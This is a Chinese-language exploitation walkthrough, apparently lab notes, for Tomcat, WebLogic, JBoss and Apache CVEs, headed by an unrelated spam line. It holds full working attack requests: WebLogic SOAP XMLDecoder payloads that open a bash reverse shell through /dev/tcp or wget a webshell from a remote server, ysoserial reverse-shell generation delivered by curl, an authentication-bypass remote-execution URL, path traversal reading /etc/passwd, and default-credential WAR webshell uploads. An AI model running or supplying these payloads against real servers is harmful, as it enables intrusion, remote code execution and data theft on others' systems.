工信部个人网站备案广州最新疫情最新消息
Tomcat
CVE-2017-12615
1.打开环境,抓包
2.切换请求头为 PUT,请求体添加木马,并在请求头添加木马文件名 1.jsp,后方需要以 / 分隔
3.连接
后台弱口令部署war包
1.打开环境,进入指点位置,账户密码均为 tomcat
2.在此处上传一句话木马,先压缩,再将后缀改为 .war
3.连接
CVE-2020-1938
1.打开环境,使用 Tomcat CVE-2020-1938 py 脚本工具中的文件包含脚本查看文件内容
python2 CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml 环境ip
WebLogin
后台弱口令 GetShell
1.打开环境,进入操作台 /console
2.登录,账号密码: weblogic/Oracle@123,进入 部署-->安装-->上传文件
3.上传木马文件,先压缩,再将后缀改为 .war,访问
4.连接
CVE-2017-3506
1.打开环境,拼接以下任意目录,验证是否存在漏洞
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
2.抓包当前页面,将反弹 shell 数据包替换
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 环境ip:8605
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/本机ip/7777 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>3.开启监听,放包后获取 shell
CVE-2019-2725
1.打开环境, 拼接 /_async/AsyncResponseService 验证是否存在漏洞
2.当前页面抓包,将带木马的数据包替换
POST /_async/AsyncResponseService HTTP/1.1
Host: 本机ip:8605
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 838
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://下载木马的服务器ip/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/12121.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>3.访问木马并连接
http://ip:8605/bea_wls_internal/12121.jsp
CVE-2018-2628
1.打开环境,使用 liqun 工具上传木马
2.访问木马并连接
CVE-2018-2894
1.打开环境,使用 docker-compose logs | grep password 获取密码
weblogic/J1WrSilh
2.拼接 /console/login/LoginForm.jsp 进入登录页面,登录,依次点击 base_domain-->高级-->启用 web 服务测试页后保存设置
3.访问拼接 /ws_utc/config.do 页面,将目录设置为 ws_utc 应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
以上为环境配置
4.点击安全-->添加,上传木马
5.右键检查,搜索 1 ,获取时间戳
6.访问木马并连接
/ws_utc/css/config/keystore/1722935567879_1411.jsp
CVE-2020-14882
1.打开环境,拼接 /console/css/%252e%252e%252fconsole.portal 绕过登录
2.拼接以下目录连接漏洞
/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")
Jboss
CVE-2015-7501
1.访问目标的 /invoker/JMXInvokerServlet 目录会直接给我们下载,这说明接⼝开放,此接⼝存在反序列化漏洞
2.我们可以用工具ysoserial对其进行利用,下载链接https://github.com/frohoff/ysoserial 然后写一句fantanshell的语句,并将其进行base64编码,
bash -i >& /dev/tcp/ip/port 0>&1
3.在终端中运行我们下载的工具,命令如下
java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c
{echo,编码后的反弹shell}|{base64,-d}|{bash,-i}
">exp.ser
4.成功执行后开启我们服务器的监听端口 nc -lvvp 4444,然后执行如下命令
curl http://靶机IP:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
即可成功反弹到shell
CVE-2017-7504
1.拼接访问漏洞网址
/jbossmq-httpil/HTTPServerILServlet
2.使用工具获取权限
python3 jexboss.py -u http://112.126.80.8:8610/
CVE-2017-12149
1.打开环境,拼接以下目录检测是否存在漏洞,返回 500 说明存在漏洞
/invoker/readonly
2.使用工具 jboss反序列化_CVE-2017-12149.jar 获取信息
Administration Console 弱口令
1.打开环境,拼接以下目录进入登录界面,账户密码 admin:vulhub ,登录后台
/admin-console/login.seam?conversationId=4
2.依次点击,上传木马文件,依旧是先压缩,然后改为 war 后缀
注: 上传时压缩的文件名尽量起英文,不要用数字,亲测起数字名上传会报错
3.访问木马并连接
低版本JMX Console未授权
1.打开环境,拼接以下目录,进入登录界面,登录, 这⾥我们使用得复现环境不存在,所以需要密码(正常环境无需密码直接可进入)
/jmx-console/
2. 找到jboss.deployment (jboss 自带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去
3.找到 void addURL
4.回到环境上传木马
http://112.126.80.8:8610/test.war
6.访问木马并连接
高版本JMX Console未授权
1.打开环境,拼接 /jmx-console/ 进入登录界面,登录
2. 进入 service=MainDeployer 页面之后,找到methodIndex为17或19的deploy 填写远程war包地址进行远程部署
3上传木马并访问链接
Apache
CVE-2021-41773
1.打开环境,然后直接使用poc,curl去查询,命令如下
curl http://IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
2.执行成功后即可获取敏感文件内容
